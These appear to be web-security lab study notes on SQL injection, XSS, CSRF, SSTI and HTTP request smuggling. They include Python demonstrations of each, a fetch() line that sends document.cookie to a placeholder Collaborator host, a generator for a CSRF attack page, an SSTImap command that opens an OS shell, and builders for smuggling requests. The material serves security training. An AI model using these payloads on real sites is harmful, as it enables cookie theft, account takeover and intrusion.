Not all injections can be detected by probing with ', " or ` and watching for an error or a changed response; blind cases (e.g. time-based) give no visible signal, so use Burp Scanner for them.
Lab: Blind SQL injection with time delays
XSS
HTML entities are decoded inside event handler attributes: when input is reflected into an onclick (or similar) handler, the browser entity-decodes the attribute value before handing it to the JavaScript engine, so a character that was converted to an HTML entity is not actually escaped. An entity you supply yourself (e.g. &apos;) passes a filter that only looks for raw quotes and then decodes to a quote that closes the JS string.
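Added example (not code from the page or from any real framework) showing why entities don't protect an event handler. `vulnerable_render` is a hypothetical filter that HTML-encodes angle brackets and double quotes and backslash-escapes single quotes, as in the PortSwigger lab pattern; `js_seen_by_browser` models the one step that matters, the browser decoding the attribute before executing it. The hardened version JS-escapes first and then HTML-encodes including `&`, so no attacker-supplied entity survives as a quote. The payload and the `track('/log?u=' + ...)` handler are constructed for the example.

```python
import html
import json
import re

# Constructed attacker input: no raw ' " < > or backslash, so it slips past a
# filter that only handles those characters. The entities do the work.
PAYLOAD = "&apos;-alert(1)-&apos;"


def vulnerable_render(user_input: str) -> str:
    """Hypothetical filter: HTML-encodes < > ", backslash-escapes ' and \\,
    but leaves & alone, then reflects into a single-quoted JS string in onclick."""
    filtered = (user_input.replace("<", "&lt;").replace(">", "&gt;")
                .replace('"', "&quot;").replace("\\", "\\\\").replace("'", "\\'"))
    return f"<a onclick=\"track('/log?u=' + '{filtered}')\">link</a>"


def hardened_render(user_input: str) -> str:
    """Fix: make a JS string literal first, then HTML-encode it *including* &,
    so the browser's attribute decoding can never produce a bare quote."""
    js_literal = json.dumps(user_input)              # "..." with \" and \\ escaped
    attr_safe = html.escape(js_literal, quote=True)  # & -> &amp;  " -> &quot;
    return f"<a onclick=\"track('/log?u=' + {attr_safe})\">link</a>"


def js_seen_by_browser(fragment: str) -> str:
    """Model of the browser: the onclick attribute value is entity-decoded
    before it reaches the JavaScript engine (single pass, like html.unescape)."""
    m = re.search(r'onclick="([^"]*)"', fragment)
    return html.unescape(m.group(1))


def breaks_out(js: str) -> bool:
    """True when -alert(1)- ended up outside the string literal."""
    return "''-alert(1)-''" in js


if __name__ == "__main__":
    print("vulnerable ->", js_seen_by_browser(vulnerable_render(PAYLOAD)))
    print("hardened   ->", js_seen_by_browser(hardened_render(PAYLOAD)))
```

The vulnerable path yields `track('/log?u=' + ''-alert(1)-'')` after decoding, which runs `alert(1)`; the hardened path yields a JS string whose content is still the literal text `&apos;-alert(1)-&apos;`.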
Fetch function (cookie exfiltration; BURP-COLLAB is the placeholder for your Collaborator payload; HttpOnly cookies are not in document.cookie)
fetch("https://BURP-COLLAB", {method: "POST", mode: "cors", body: document.cookie}); // POST with a plain-text body is a "simple" request: no preflight, so it is sent even though the CORS response is blocked
CSRF
A cookie set without a SameSite attribute is treated as Lax by default (Chrome), with one relaxation: for the first 120 seconds after it is set, the browser still sends it on top-level cross-site POST requests (the "Lax + POST" mitigation). An explicit SameSite=Lax cookie never gets this allowance.
So to exploit such a cookie you need to get it (re)issued first, e.g. by triggering a login/OAuth flow or any endpoint that sets a fresh session cookie, and then submit the cross-site POST within the two-minute window.
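Added example, not from the page or from PortSwigger: a small model of the SameSite decision including the 120-second "Lax + POST" window, plus a generator for the attacker page that refreshes the cookie and then submits the POST. The model assumes a Secure cookie over HTTPS; `refresh_url`, `target_url` and the form fields in the usage are placeholders for the target's cookie-setting endpoint and the CSRF target.

```python
from dataclasses import dataclass
from typing import Dict, Optional

LAX_POST_WINDOW_S = 120            # grace period for cookies with no SameSite attribute
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


@dataclass
class Cookie:
    name: str
    samesite: Optional[str]        # "Strict", "Lax", "None", or None when the attribute is absent
    set_at: float                  # time (seconds) at which the browser stored the cookie


def sent_on_cross_site_request(cookie: Cookie, method: str, top_level: bool, now: float) -> bool:
    """Model of whether a *cross-site* request carries the cookie
    (assumes Secure over HTTPS; SameSite=None without Secure is rejected anyway)."""
    if cookie.samesite == "None":
        return True
    if cookie.samesite == "Strict" or not top_level:
        return False               # Lax never attaches to cross-site XHR/fetch/sub-resources
    if method.upper() in SAFE_METHODS:
        return True                # Lax: top-level navigations with safe methods
    # Top-level POST: explicit Lax blocks it; default-Lax allows it inside the window
    return cookie.samesite is None and (now - cookie.set_at) < LAX_POST_WINDOW_S


def exploit_page(refresh_url: str, target_url: str, fields: Dict[str, str], delay_ms: int = 5000) -> str:
    """Attacker-hosted page (hypothetical URLs). On a click (window.open needs a
    user gesture), open refresh_url so the target re-issues its session cookie
    with a fresh timestamp, then submit a top-level POST a few seconds later."""
    inputs = "".join(f'<input type="hidden" name="{k}" value="{v}">' for k, v in fields.items())
    return f"""<html><body>
<form id="csrf" method="POST" action="{target_url}">{inputs}</form>
<p>Click anywhere on this page</p>
<script>
window.onclick = () => {{
  window.open("{refresh_url}");   // Set-Cookie without SameSite -> default Lax, window starts now
  setTimeout(() => document.getElementById("csrf").submit(), {delay_ms});  // well inside 120 s
}};
</script>
</body></html>"""


if __name__ == "__main__":
    # Placeholder endpoints, not a real target.
    print(exploit_page("https://target.example/social-login",
                       "https://target.example/my-account/change-email",
                       {"email": "attacker@example.net"}))
```

The delay only has to be long enough for the refresh response to land; anything under two minutes works, and a form submission (top-level navigation) is required since a fetch()/XHR POST is not top-level and gets no cookie at all.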
SSTI
Command for detection & exploitation (SSTImap)
./sstimap.py -u https://www.example.net/?msg=test
  -e ENGINE   test only the given template engine instead of probing all of them, e.g. -e ERB
  --os-shell  open an interactive OS shell once the injection is confirmed
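What the detection phase boils down to, as an added example (not SSTImap's own code): send per-engine arithmetic probes and see whether the response contains the evaluated result instead of the raw expression, then use a second probe to tell engines with the same delimiters apart (Jinja2 repeats a string, Twig coerces it to a number). The `make_fake_site` servers are constructed stand-ins for `https://www.example.net/?msg=` so the script runs offline; in practice `send` would be an HTTP request that returns the response body.

```python
import html
import re
from typing import Callable, List, Optional

# (payload, text expected in the response if a template engine evaluated it)
PROBES = [
    ("{{7*7}}", "49"),         # Jinja2, Twig, Nunjucks
    ("${7*7}", "49"),          # Freemarker, Mako
    ("<%= 7*7 %>", "49"),      # ERB
    ("#{7*7}", "49"),          # Pug, Ruby interpolation
]
# Tie-break for {{ }}: Jinja2 gives string repetition, Twig coerces to a number.
TIE_BREAK = ("{{7*'7'}}", {"7777777": "Jinja2", "49": "Twig"})

Sender = Callable[[str], str]   # send(payload) -> response body


def probe(send: Sender) -> List[str]:
    """Return the probe payloads whose evaluated result showed up in the response."""
    hits = []
    for payload, expected in PROBES:
        body = send(payload)
        if expected in body and payload not in body:
            hits.append(payload)
    return hits


def fingerprint(send: Sender) -> Optional[str]:
    """Name the engine family, or None when nothing is evaluated."""
    hits = probe(send)
    if "{{7*7}}" in hits:
        body = send(TIE_BREAK[0])
        for marker, engine in TIE_BREAK[1].items():
            if marker in body:
                return engine
        return "Jinja2/Twig-like"
    if "<%= 7*7 %>" in hits:
        return "ERB"
    if "${7*7}" in hits:
        return "Freemarker/Mako-like"
    if "#{7*7}" in hits:
        return "Pug/Ruby-like"
    return None


# --- constructed stand-ins for the target so this runs offline ---
def _evaluate(expr: str, coerce_strings: bool) -> Optional[str]:
    """Evaluate only the probe shapes 7*7 and 7*'7'; anything else stays as-is."""
    m = re.fullmatch(r"(\d+)\*('?)(\d+)\2", expr.strip())
    if not m:
        return None
    a, quoted, b = m.groups()
    if quoted and not coerce_strings:
        return b * int(a)          # string repetition, as Jinja2 (Python semantics) does
    return str(int(a) * int(b))


def make_fake_site(open_tag: str, close_tag: str, coerce_strings: bool = True) -> Sender:
    """Fake server that reflects ?msg= into a template using the given delimiters."""
    pat = re.compile(re.escape(open_tag) + r"\s*(.*?)\s*" + re.escape(close_tag))

    def site(msg: str) -> str:
        rendered = pat.sub(lambda m: _evaluate(m.group(1), coerce_strings) or m.group(0), msg)
        return f"<p>Hello {rendered}</p>"
    return site


def safe_site(msg: str) -> str:
    """Fake server that HTML-encodes the parameter instead of rendering it."""
    return f"<p>Hello {html.escape(msg)}</p>"


if __name__ == "__main__":
    for name, site in [("ERB", make_fake_site("<%=", "%>")),
                       ("Jinja2", make_fake_site("{{", "}}", coerce_strings=False)),
                       ("safe", safe_site)]:
        print(name, "->", fingerprint(site))
```

The `payload not in body` condition matters: a page that merely echoes `{{7*7}}` back unchanged is not vulnerable, and an echo that happens to contain "49" elsewhere would otherwise be a false positive.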
Newlines before and after the chunk-size line in a chunked body
Before the size line
  0 (terminating chunk): 1 newline, i.e. the CRLF that ends the previous chunk's data; 2 newlines if the 0 is the first line of the body of the first request, because the blank line that ends the headers is the second one
After the size line
  0: 2 newlines (one ends the size line, one is the empty trailer section), giving 0\r\n\r\n
  any other size: 1 newline, then exactly that many bytes of chunk data
Use \r\n line endings in Repeater, and turn off "Update Content-Length" whenever the Content-Length is meant to be wrong.
Identification: Burp Scanner vs the HTTP Request Smuggler extension
Note: Burp Scanner reports the smuggling issue but does not say whether it is TE.CL or CL.TE.
Tested on 10 Oct 2023. Lab ID follows the order of the request smuggling labs on PortSwigger's All Labs page.

Lab ID | Burp Scanner | HTTP Request Smuggler extension
1      | ✅           | ✅ (Smuggle Probe)
2      | ✅           | ✅ (Smuggle Probe)
3      | ✅           | ✅ (Smuggle Probe)
4      | ✅           | ✅ (Smuggle Probe)
5      | ✅           | ✅ (Smuggle Probe)
6      | ✅           | ✅ (Smuggle Probe)
7      | ✅           | ✅ (Smuggle Probe)
8      | ❌           | ✅ (HTTP/2 probe)
9      | ❌           | ❌ ("All scans" reports H2.TE; the correct answer is H2.CL)
10     | ❌           | ❌ ("All scans" reports H2.TE and Dual Path Support; the correct answer is H2 injection via CRLF)
11     | ❌           | ❌ ("All scans" reports Dual Path Support only; the correct answer is H2 request splitting via CRLF)
12     | ❌           | ✅ (only when every endpoint is scanned ⚠)
13     | ✅           | ✅ (Smuggle Probe)
14     | ✅           | ✅ (Smuggle Probe)
15     | ✅           | ✅ (Smuggle Probe)
TE.CL
The smuggled second request must carry its own Content-Type and Content-Length headers, with a Content-Length larger than the body that is actually present, so the back-end keeps waiting for the rest and the next user's request gets appended to it.
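Both the chunk-framing rules above and the TE.CL note, as one added example (not from the page, PortSwigger or Burp): build the CL.TE and TE.CL requests byte-exact, computing the hex chunk size and the outer and inner Content-Length values instead of counting by hand, and feed them through two toy parsers standing in for a server that honours Content-Length and one that honours Transfer-Encoding. The host name and the smuggled request lines are placeholders; `steal` is the number of bytes the back-end will take from the next request on the connection.

```python
import re
from typing import List, Tuple

CRLF = b"\r\n"
FORM = ("Content-Type", "application/x-www-form-urlencoded")
TRAILER = CRLF + b"0" + CRLF + CRLF    # what follows the chunk data inside a single-chunk body


def chunked_body(chunks: List[bytes]) -> bytes:
    """Exact chunked framing: <hex size> CRLF <data> CRLF ... then 0 CRLF CRLF.
    The terminating 0 is preceded by one CRLF (the one ending the previous chunk's
    data; with no chunks, the blank line after the headers supplies it) and followed
    by two (end of the size line, then the empty trailer section)."""
    out = b""
    for data in chunks:
        out += f"{len(data):x}".encode() + CRLF + data + CRLF
    return out + b"0" + CRLF + CRLF


def build_request(request_line: str, headers: List[Tuple[str, str]], body: bytes = b"") -> bytes:
    head = CRLF.join([request_line.encode()] + [f"{k}: {v}".encode() for k, v in headers])
    return head + CRLF + CRLF + body


def header_value(raw: bytes, name: str) -> str:
    """First occurrence of a header (case-insensitive), or '' if absent."""
    m = re.search(rb"(?im)^" + re.escape(name.encode()) + rb":[ \t]*([^\r\n]*)", raw)
    return m.group(1).decode() if m else ""


def cl_te(host: str, smuggled: bytes) -> bytes:
    """CL.TE: Content-Length covers the whole body, so the front-end forwards all of
    it; the back-end honours Transfer-Encoding, stops at 0 CRLF CRLF and leaves
    `smuggled` on the connection as the prefix of the next request."""
    body = chunked_body([]) + smuggled          # b"0\r\n\r\n" + smuggled
    headers = [("Host", host), FORM, ("Content-Length", str(len(body))), ("Transfer-Encoding", "chunked")]
    return build_request("POST / HTTP/1.1", headers, body)


def te_cl(host: str, smuggled_line: str, smuggled_body: bytes, steal: int = 5) -> bytes:
    """TE.CL: the front-end honours Transfer-Encoding and forwards the whole chunk;
    the back-end honours Content-Length, which covers only the chunk-size line, so
    the chunk data is parsed as a new request. That inner request carries its own
    Content-Type and a Content-Length larger than the bytes actually present
    (its body plus the trailing CRLF 0 CRLF CRLF), so the back-end keeps reading
    and the next victim's request becomes the tail of it."""
    inner_cl = len(smuggled_body) + len(TRAILER) + steal
    inner = build_request(smuggled_line, [("Host", host), FORM, ("Content-Length", str(inner_cl))], smuggled_body)
    body = chunked_body([inner])
    size_line_len = len(f"{len(inner):x}".encode() + CRLF)   # e.g. b"5c\r\n" -> 4
    headers = [("Host", host), FORM, ("Content-Length", str(size_line_len)), ("Transfer-Encoding", "chunked")]
    return build_request("POST / HTTP/1.1", headers, body)


# Toy parsers: what a CL-honouring and a TE-honouring server each consume.
def split_request(raw: bytes) -> Tuple[bytes, bytes]:
    head, _, body = raw.partition(CRLF + CRLF)
    return head, body


def read_by_content_length(stream: bytes, n: int) -> Tuple[bytes, bytes]:
    """(body, bytes left on the connection)."""
    return stream[:n], stream[n:]


def read_chunked(stream: bytes) -> Tuple[bytes, bytes]:
    """(decoded body, bytes left on the connection after 0 CRLF CRLF)."""
    body, pos = b"", 0
    while True:
        end = stream.index(CRLF, pos)
        size = int(stream[pos:end], 16)
        pos = end + 2
        if size == 0:
            return body, stream[pos + 2:]   # skip the empty trailer line
        body += stream[pos:pos + size]
        pos += size + 2                      # chunk data plus its CRLF


if __name__ == "__main__":
    print(cl_te("target.example", b"GET /404 HTTP/1.1\r\nFoo: x").decode())
    print(te_cl("target.example", "GPOST / HTTP/1.1", b"x=1").decode())
```

Run the two toy parsers over the body of each request to see the desync: for CL.TE the Content-Length reader consumes everything while the chunked reader leaves the smuggled bytes behind; for TE.CL the chunked reader consumes everything while the Content-Length reader stops after the size line and the rest starts with the smuggled request line, whose own Content-Length exceeds its body by exactly `steal` bytes.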